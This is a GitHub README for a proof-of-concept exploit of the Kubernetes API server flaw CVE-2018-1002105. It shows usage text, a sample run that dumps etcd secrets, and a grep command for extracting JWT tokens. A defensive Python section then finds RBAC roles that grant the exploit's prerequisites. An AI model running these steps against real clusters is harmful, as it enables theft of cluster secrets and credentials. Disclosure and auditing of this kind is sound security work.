GitHub - evict/poc_CVE-2018-1002105: PoC for CVE-2018-1002105.
source link: https://github.com/evict/poc_CVE-2018-1002105
CVE-2018-1002105 PoC
Proof-of-Concept exploit for CVE-2018-1002105. The current exploit requires `create` and `get` privileges on `pods` and `pods/exec`. If you do not know what that means, this is probably not meant for you. :)
The current PoC dumps the secrets from the default `etcd-kubernetes` container.
Demo
The PoC in action:
Usage
```
usage: poc.py [-h] --target TARGET [--jwt TOKEN] [--namespace NAMESPACE] --pod POD

PoC for CVE-2018-1002105.

optional arguments:
  -h, --help            show this help message and exit
  --target TARGET, -t TARGET
                        API server target:port
  --jwt TOKEN, -j TOKEN
                        JWT token for service account
  --namespace NAMESPACE, -n NAMESPACE
                        Namespace with exec access
  --pod POD, -p POD     Pod with exec access
```
Example:
```
$ ./poc.py -t 10.0.2.15:6443 --jwt [token]
[*] Building pipe...
[+] Pipe opened :D
[*] Attempting code exec in pod
[*] Dumping secrets in etcd.db....
[+] Done dumping secrets!
```
Check for tokens:
```
$ grep -air eyJ etcd.db
```
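For defenders, an added example (not part of the PoC or its repository) that lists which Roles and ClusterRoles grant the privileges this README names as prerequisites, so the accounts bound to them can be reviewed. It assumes the requirement means `create` and `get` on both `pods` and `pods/exec`; the role names in the sample are constructed.

```python
import json

# Assumption: the README's prerequisite is read as create AND get on both resources.
NEEDED = [(v, r) for r in ("pods", "pods/exec") for v in ("create", "get")]

def rule_allows(rule, verb, resource):
    """True if one RBAC PolicyRule grants verb on a core-API-group resource."""
    groups, verbs = rule.get("apiGroups", []), rule.get("verbs", [])
    if not ({"", "*"} & set(groups)) or not ({verb, "*"} & set(verbs)):
        return False
    sub = resource.partition("/")[2]  # "exec" for "pods/exec", "" for "pods"
    # A rule matches on "*", the exact name, or the "*/subresource" form.
    return any(res in ("*", resource) or (sub and res == "*/" + sub)
               for res in rule.get("resources", []))

def roles_meeting_prerequisites(role_list):
    """Names of Roles/ClusterRoles whose rules cover every pair in NEEDED."""
    hits = []
    for item in role_list.get("items", []):
        rules = item.get("rules") or []
        if all(any(rule_allows(r, v, res) for r in rules) for v, res in NEEDED):
            meta = item["metadata"]
            ns = meta.get("namespace")
            scope = f"{ns}/" if ns else ""
            hits.append(f"{item['kind']}/{scope}{meta['name']}")
    return hits

# Constructed sample, shaped like `kubectl get roles,clusterroles -A -o json`.
SAMPLE = json.loads("""
{"kind": "List", "items": [
 {"kind": "Role", "metadata": {"name": "exec-debugger", "namespace": "dev"},
  "rules": [{"apiGroups": [""], "resources": ["pods", "pods/exec"],
             "verbs": ["get", "create"]}]},
 {"kind": "Role", "metadata": {"name": "pod-reader", "namespace": "dev"},
  "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list"]}]},
 {"kind": "ClusterRole", "metadata": {"name": "wildcard-admin"},
  "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]}
]}
""")

if __name__ == "__main__":
    for name in roles_meeting_prerequisites(SAMPLE):
        print("grants the PoC's prerequisites:", name)
```

A role listed here only matters through the RoleBindings and ClusterRoleBindings that reference it, so review those subjects next.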